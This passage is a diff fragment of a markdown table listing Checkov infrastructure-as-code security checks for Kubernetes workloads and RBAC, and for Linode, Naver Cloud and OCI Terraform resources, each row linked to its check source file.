+| 3684 | CKV_K8S_147 | resource | StatefulSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | 
+| 3685 | CKV_K8S_148 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3686 | CKV_K8S_148 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3687 | CKV_K8S_148 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3688 | CKV_K8S_148 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3689 | CKV_K8S_148 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3690 | CKV_K8S_148 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3691 | CKV_K8S_148 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3692 | CKV_K8S_148 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3693 | CKV_K8S_148 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3694 | CKV_K8S_148 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | 
+| 3695 | CKV_K8S_149 | resource | CronJob | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3696 | CKV_K8S_149 | resource | DaemonSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3697 | CKV_K8S_149 | resource | Deployment | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3698 | CKV_K8S_149 | resource | DeploymentConfig | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3699 | CKV_K8S_149 | resource | Job | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3700 | CKV_K8S_149 | resource | Pod | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | 
[KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3701 | CKV_K8S_149 | resource | PodTemplate | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3702 | CKV_K8S_149 | resource | ReplicaSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3703 | CKV_K8S_149 | resource | ReplicationController | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3704 | CKV_K8S_149 | resource | StatefulSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | 
+| 3705 | CKV_K8S_151 | resource | CronJob | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3706 | CKV_K8S_151 | resource | DaemonSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3707 | CKV_K8S_151 | resource | Deployment | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | 
[KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3708 | CKV_K8S_151 | resource | DeploymentConfig | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3709 | CKV_K8S_151 | resource | Job | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3710 | CKV_K8S_151 | resource | Pod | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3711 | CKV_K8S_151 | resource | PodTemplate | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3712 | CKV_K8S_151 | resource | ReplicaSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3713 | CKV_K8S_151 | resource | ReplicationController | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3714 | CKV_K8S_151 | resource | StatefulSet | Ensure that the Kubelet only makes use of Strong 
Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | 
+| 3715 | CKV_K8S_152 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain LUA code execution. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py) | 
+| 3716 | CKV_K8S_153 | resource | Ingress | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py) | 
+| 3717 | CKV_K8S_154 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py) | 
+| 3718 | CKV_K8S_155 | resource | ClusterRole | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations | Kubernetes | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py) | 
+| 3719 | CKV_K8S_156 | resource | ClusterRole | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests | Kubernetes | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py) | 
+| 3720 | CKV_K8S_157 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | 
[RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | 
+| 3721 | CKV_K8S_157 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | 
+| 3722 | CKV_K8S_158 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | 
+| 3723 | CKV_K8S_158 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | 
+| 3724 | CKV2_K8S_1 | resource | ClusterRole | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | 
+| 3725 | CKV2_K8S_1 | resource | ClusterRoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | 
+| 3726 | CKV2_K8S_1 | resource | Role | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | 
+| 3727 | CKV2_K8S_1 | resource | RoleBinding | RoleBinding should not allow privilege escalation to a 
ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | 
+| 3728 | CKV2_K8S_2 | resource | ClusterRole | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | 
+| 3729 | CKV2_K8S_2 | resource | ClusterRoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | 
+| 3730 | CKV2_K8S_2 | resource | Role | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | 
+| 3731 | CKV2_K8S_2 | resource | RoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | 
+| 3732 | CKV2_K8S_3 | resource | ClusterRole | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | 
+| 3733 | CKV2_K8S_3 | resource | ClusterRoleBinding | No ServiceAccount/Node should have `impersonate` permissions for 
groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | 
+| 3734 | CKV2_K8S_3 | resource | Role | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | 
+| 3735 | CKV2_K8S_3 | resource | RoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | 
+| 3736 | CKV2_K8S_4 | resource | ClusterRole | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | 
+| 3737 | CKV2_K8S_4 | resource | ClusterRoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | 
+| 3738 | CKV2_K8S_4 | resource | Role | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. 
| Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | 
+| 3739 | CKV2_K8S_4 | resource | RoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | 
+| 3740 | CKV2_K8S_5 | resource | ClusterRole | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | 
+| 3741 | CKV2_K8S_5 | resource | ClusterRoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | 
+| 3742 | CKV2_K8S_5 | resource | Role | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | 
+| 3743 | CKV2_K8S_5 | resource | RoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | 
+| 3744 | CKV2_K8S_6 | resource | Deployment | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | 
+| 3745 | CKV2_K8S_6 | resource | Pod | Minimize the admission of pods which lack an associated NetworkPolicy | 
Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | 
+| 3746 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | 
+| 3747 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | 
+| 3748 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | 
+| 3749 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | 
+| 3750 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | 
+| 3751 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | 
+| 3752 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | 
+| 3753 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access 
control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | 
+| 3754 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | 
+| 3755 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | 
+| 3756 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | 
+| 3757 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | 
+| 3758 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | 
+| 3759 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. 
| Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | 
+| 3760 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | 
+| 3761 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | 
+| 3762 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | 
+| 3763 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | 
+| 3764 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. 
| Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | 
+| 3765 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | 
+| 3766 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | 
+| 3767 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | 
+| 3768 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | 
+| 3769 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | 
+| 3770 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. 
| Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 3771 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | +| 3772 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | +| 3773 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | +| 3774 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 3775 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 3776 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. 
| Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | +| 3777 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | +| 3778 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | +| 3779 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | +| 3780 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | +| 3781 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | +| 3782 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | +| 3783 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | 
[InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | +| 3784 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | +| 3785 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | +| 3786 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | +| 3787 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | +| 3788 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | +| 3789 | 